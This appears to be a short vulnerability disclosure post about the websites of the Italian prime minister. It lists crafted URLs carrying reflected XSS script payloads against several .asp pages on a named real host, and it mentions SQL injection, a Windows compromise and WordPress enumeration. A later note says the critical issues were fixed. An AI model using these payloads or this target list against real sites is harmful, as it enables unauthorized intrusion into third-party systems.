http://www.matteorenzi.it/ | http://matteorenzi.sgpitalia.com | XSS, SQL INJ, etc

Personal website of the Italian  prime minister.



OLDER WEBSITE
XSS and SQL injections. Sys compromise (windows)

http://matteorenzi.sgpitalia.com/contenuto_beta.asp?parametri=%22%3E%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E%3C%22%A7%A7%A7%A7%A7%A7vedi_v%27id%27eo%A7%A7%A71%A7%A7%A70


http://matteorenzi.sgpitalia.com/contenuto_beta.asp?parametri=1%EF%BF%BD%EF%BF%BD%EF%BF%BD72195%EF%BF%BD%EF%BF%BD%EF%BF%BD72195/0012%EF%BF%BD%EF%BF%BD%EF%BF%BD0%EF%BF%BD%EF%BF%BD%EF%BF%BDvedi_evento%EF%BF%BD%EF%BF%BD%EF%BF%BD1%EF%BF%BD%EF%BF%BD%EF%BF%BD0%EF%BF%BD%EF%BF%BD%EF%BF%BDpulisci%EF%BF%BD%EF%BF%BD%EF%BF%BD

carrello_beta.asp?azione=%22%3E%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E%3C%22%A7%A7%A7%A7%A7%A7vedi_v%27id%27eo%A7%A7%A71%A7%A7%A70

finestra_stampa_beta.asp?numero_immagini=%22%3E%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E%3C%22%A7%A7%A7%A7%A7%A7vedi_v%27id%27eo%A7%A7%A71%A7%A7%A70

popup.asp 

http://matteorenzi.sgpitalia.com/contenuto_beta.asp?parametri=76678%A7%A7%A776678/0075%A7%A7%A7vedi_evento%A7%A7%A71%A7%A7%A70#ad-image-5

UPDATE! 2015
On WORDPRESS

Authors enumeration is allowed (not a big issue).
Folder listing ex. /wp-content/plugins/ (not a big issue).

Sql  Injection (I will disclose/update this part in the future).

UPDATE 2016

They've fixed the critical issues.